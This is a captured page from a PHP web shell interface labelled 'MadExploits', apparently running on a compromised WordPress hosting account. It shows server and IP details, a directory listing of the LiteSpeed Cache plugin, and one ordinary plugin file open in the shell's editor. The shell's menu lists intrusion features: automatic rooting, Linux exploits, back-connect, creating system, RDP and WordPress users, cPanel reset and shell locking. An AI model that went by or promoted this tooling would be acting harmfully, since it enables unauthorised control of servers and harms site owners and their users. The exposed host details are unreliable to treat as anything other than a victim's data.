Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 18.218.180.238
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
temmmp /
anonmags.com /
wp-content /
plugins /
litespeed-cache /
tpl /
inc /
[ HOME SHELL ]
Name
Size
Permission
Action
admin_footer.php
1.54
KB
-rw-r--r--
api_key.php
294
B
-rw-r--r--
check_cache_disabled.php
1.55
KB
-rw-r--r--
check_if_network_disable_all.p...
623
B
-rw-r--r--
disabled_all.php
259
B
-rw-r--r--
in_upgrading.php
241
B
-rw-r--r--
metabox.php
1.07
KB
-rw-r--r--
modal.footer.php
9
B
-rw-r--r--
modal.header.php
502
B
-rw-r--r--
show_display_installed.php
1.34
KB
-rw-r--r--
show_error_cookie.php
682
B
-rw-r--r--
show_rule_conflict.php
687
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : show_error_cookie.php
<?php namespace LiteSpeed; defined('WPINC') || exit(); $err = __('NOTICE: Database login cookie did not match your login cookie.', 'litespeed-cache') . ' ' . __('If the login cookie was recently changed in the settings, please log out and back in.', 'litespeed-cache') . ' ' . sprintf(__('If not, please verify the setting in the <a href="%1$s">Advanced tab</a>.', 'litespeed-cache'), admin_url('admin.php?page=litespeed-cache#advanced')); if (LITESPEED_SERVER_TYPE === 'LITESPEED_SERVER_OLS') { $err .= ' ' . __('If using OpenLiteSpeed, the server must be restarted once for the changes to take effect.', 'litespeed-cache'); } self::add_notice(self::NOTICE_YELLOW, $err);
Close